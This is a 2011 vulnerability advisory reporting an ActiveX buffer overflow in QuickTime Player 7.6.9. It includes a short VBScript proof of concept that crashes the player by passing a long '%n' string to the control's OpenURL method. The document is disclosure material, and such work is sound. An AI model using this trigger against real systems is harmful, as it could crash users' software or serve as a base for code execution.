Author(s): Ivan Sanchez & Hernan Hegykozi
Contact Us: security@evilcode.com.ar
Versions: QuickTimePlayer_7.6.9
Date: 06/09/2011
Product:QuickTimePlayer_7.6.9
Vendor Notified: 2 months ago “Apple Inc / bugreport.apple.com ”
Problem ID: 9753778
We have discovered that the product “QuickTimePlayer_7.6.9″ presents a big hole regarding an ActiveX Control Buffer Overflow, crashing the application when you run special code.
Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of QuickTimePlayer.dll. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the QuickTimePlayer.dll component explicitly trusting a length embedded within a particular file in order to calculate the length of a buffer. The application will then duplicate an arbitrarily sized string into a statically sized buffer located on the stack. This can lead to code execution under the context of the application.
POC:
1-Open the Quicktime ,
2-Run the following code:
crashapp.wsf
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:0F5B08E7-94EE-470B-A184-5CD4A7DF35A3' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\QuickTime\QuickTimePlayer.dll"
prototype = "Sub OpenURL ( ByVal url As String )"
memberName = "OpenURL"progid = "QuickTimePlayerLib.QuickTimePlayer"
argCount = 1
arg1="%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
target.OpenURL arg1
</script>
</job>
</package>
3-The APP will crash.
Trend
